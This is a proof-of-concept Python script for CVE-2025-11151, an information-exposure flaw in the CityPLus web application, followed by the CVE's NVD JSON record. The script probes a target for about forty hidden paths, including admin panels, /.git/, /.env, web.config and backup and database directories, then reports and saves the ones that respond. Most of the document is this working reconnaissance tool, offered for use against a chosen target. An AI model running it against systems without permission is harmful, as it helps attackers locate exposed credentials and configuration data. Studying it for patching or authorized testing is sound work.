CVE-2025-11151

# CVE-2025-11151 PoC - CityPLus Unpublished Web Page Detection # This PoC demonstrates how to detect unpublished/hidden web pages in CityPLus import requests import sys from urllib.parse import urljoin TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-cityplus-server" # Common unpublished/hidden page paths commonly found in CityPLus HIDDEN_PATHS = [ "/admin/", "/admin/login.aspx", "/yonetim/", "/yonetim/giris.aspx", "/panel/", "/internal/", "/debug/", "/test/", "/backup/", "/config/", "/api/", "/api/v1/", "/private/", "/hidden/", "/system/", "/management/", "/dashboard/", "/reports/", "/logs/", "/temp/", "/uploads/", "/files/", "/db/", "/database/", "/setup/", "/install/", "/status/", "/health/", "/info/", "/phpinfo.php", "/server-status", "/server-info", "/.git/", "/.env", "/web.config", "/sitemap.xml", "/robots.txt" ] def detect_unpublished_pages(base_url): """Detect unpublished web pages in CityPLus application""" print(f"[*] Scanning target: {base_url}") print(f"[*] CVE-2025-11151 - CityPLus Unpublished Page Detection") print("-" * 60) found_pages = [] session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (compatible; SecurityScanner/1.0)" }) for path in HIDDEN_PATHS: url = urljoin(base_url, path) try: response = session.get(url, timeout=10, allow_redirects=False) # Check for accessible unpublished pages if response.status_code == 200: # Check if response contains sensitive content content_length = len(response.content) if content_length > 0: print(f"[+] FOUND: {url} - Status: {response.status_code} - Size: {content_length} bytes") found_pages.append({ "url": url, "status": response.status_code, "size": content_length }) elif response.status_code == 403: print(f"[!] FORBIDDEN: {url} - Page exists but access denied") found_pages.append({ "url": url, "status": response.status_code, "size": 0 }) elif response.status_code == 401: print(f"[!] AUTH REQUIRED: {url} - Authentication required") found_pages.append({ "url": url, "status": response.status_code, "size": 0 }) except requests.exceptions.RequestException as e: pass print("-" * 60) print(f"[*] Scan complete. Found {len(found_pages)} potentially sensitive pages.") if found_pages: print("\n[!] VULNERABLE - Unpublished pages detected!") print("[!] Affected versions: CityPLus before V24.29500.1.0") return found_pages if __name__ == "__main__": results = detect_unpublished_pages(TARGET_URL) # Export results if results: with open("cityplus_exposed_pages.txt", "w") as f: for page in results: f.write(f"{page['url']} - Status: {page['status']}\n") print(f"\n[*] Results saved to cityplus_exposed_pages.txt")

{"cve": {"id": "CVE-2025-11151", "sourceIdentifier": "[email protected]", "published": "2025-10-21T14:15:46.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Beyaz Bilgisayar Software Design Industry and Trade Ltd. Co. CityPLus allows Detect Unpublicized Web Pages.This issue affects CityPLus: before V24.29500.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0351", "source": "[email protected]"}]}}